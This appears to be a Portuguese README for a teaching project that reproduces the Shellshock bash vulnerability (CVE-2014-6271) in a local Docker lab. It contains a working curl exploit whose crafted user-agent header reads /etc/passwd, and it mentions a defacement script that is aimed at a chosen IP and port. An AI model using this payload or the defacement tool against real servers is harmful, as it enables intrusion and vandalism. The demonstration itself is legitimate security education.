
Projeto de apresentação de uma CVE (ShellShock) com pdf, demonstração técnica e reprodutível.
Este projeto permite reproduzir a vulnerabilidade CVE-2014-6271, também conhecida como Shellshock. Shellshock é uma vulnerabilidade de segurança no Bash que permite executar código malicioso através de variáveis de ambiente.
O objetivo deste projeto é demonstrar o impacto desta vulnerabilidade em um ambiente Docker.
Antes de começar, certifique-se de ter o Docker instalado em sua máquina. Você pode baixar o Docker aqui.
No diretório do projeto, construa a imagem Docker executando o seguinte comando:
docker build -t ['image name'] .
Substitua ['image name'] pelo nome que você deseja dar à imagem Docker.
Após construir a imagem, inicie um contêiner a partir desta imagem com o seguinte comando:
docker run -it --rm -p 8080:80 ['image name']
Isso exporá o serviço na porta 8080 da sua máquina local.
Abra seu navegador e acesse http://localhost:8080. Você poderá observar o comportamento da aplicação e testar a vulnerabilidade.
Em outro terminal, execute o seguinte comando para explorar a vulnerabilidade e ler o conteúdo do arquivo /etc/passwd:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
Este comando envia um cabeçalho user-agent especialmente projetado para explorar o Shellshock. Se a vulnerabilidade for corretamente reproduzida, o conteúdo de /etc/passwd será exibido na saída do terminal.
Este script permite explorar a vulnerabilidade para desfigurar uma página web alvo. A vulnerabilidade baseia-se em uma má configuração de scripts CGI, que permite a execução de comandos arbitrários no servidor.
Pré-requisito: Certifique-se de que o alvo é vulnerável ao bug ShellShock. Certifique-se de ter as permissões necessárias para testar o exploit neste alvo.
./exp_deface.sh <ip> <port>
./exp_deface.sh localhost 8080
Importante: Esta vulnerabilidade deve ser usada apenas para fins de teste e demonstração em um ambiente controlado. Não use este projeto em ambientes de produção.